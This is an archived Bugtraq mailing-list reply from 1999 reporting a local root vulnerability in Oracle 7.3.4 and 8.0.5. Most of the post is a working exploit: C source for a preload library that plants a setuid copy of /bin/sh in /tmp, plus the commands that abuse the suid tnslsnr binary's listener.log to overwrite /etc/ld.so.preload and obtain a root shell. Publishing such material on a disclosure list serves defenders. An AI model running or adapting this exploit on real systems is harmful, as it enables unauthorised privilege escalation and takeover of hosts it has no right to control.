Bugtraq mailing list archives
Re: Oracle 8 root exploit
From: martinmv () HORNET CZ (Martin Mevald)
Date: Mon, 15 Nov 1999 16:51:54 +0100
Greetings, Oracle 7.3.4 is vulnerable too. $ uname -a SunOS sun450 5.6 Generic_105181-12 sun4u sparc SUNW,Ultra-4 --- Linux: Oracle version: 8.0.5 There isn't dbsnmp with suid bit on Linux. There is tnslsnr. Program dump file listener.log: open("listener.log", O_WRONLY|O_APPEND|O_CREAT, 0666) Exploit: oracle-ex.c -------------------------- #include <unistd.h> #include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { if (!geteuid()) { remove("/etc/ld.so.preload"); execl("/bin/bash","bash","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL); } } --------------------------- $ gcc -o oracle-ex.o -c oracle-ex.c -fPIC $ gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 oracle-ex.o -nostartfiles $ unset ORACLE_HOME $ umask 0000 $ ln -s /etc/ld.so.preload /tmp/listener.log $ /u01/app/oracle/product/8.0.5/bin/tnslsnr $ echo /tmp/libno_ex.so.1.0 >/etc/ld.so.preload $ telnet localhost Trying ... Connected to localhost.localdomain. Escape character is '^]'. Connection closed by foreign host. $ ./xxxx # Martin Mevald, martinmv () hornet cz On Sat, 13 Nov 1999, Tellier, Brock wrote:
Greetings, OVERVIEW A vulnerability exists in Oracle 8.1.5 for UN*X which may allow any user to obtain root privileges.
Current thread:
- Oracle 8 root exploit Tellier, Brock (Nov 13)
- Re: Oracle 8 root exploit Adam and Christine Levin (Nov 15)
- Re: Oracle 8 root exploit Jared Still (Nov 16)
- <Possible follow-ups>
- Re: Oracle 8 root exploit Martin Mevald (Nov 15)
- Re: Oracle 8 root exploit Antonomasia (Nov 15)
- Re: Oracle 8 root exploit Elias Levy (Nov 16)
- Re: Oracle 8 root exploit Adam and Christine Levin (Nov 16)
- Re: Oracle 8 root exploit Chris Calabrese (Nov 16)
- Re: Oracle 8 root exploit Alan Olsen (Nov 19)
- [RHSA-1999:055-01] Denial of service attack in syslogd Bill Nottingham (Nov 19)
- [ COBALT ] Security Advisory - syslog Jeff Bilicki (Nov 20)
- IE 5.0 XML HTTP redirect problems Georgi Guninski (Nov 22)
- DoS with sysklogd, glibc (Caldera) Alfred Huger (Nov 22)
- Re: DoS with sysklogd, glibc (Caldera) Balazs Scheidler (Nov 22)
(Thread continues...)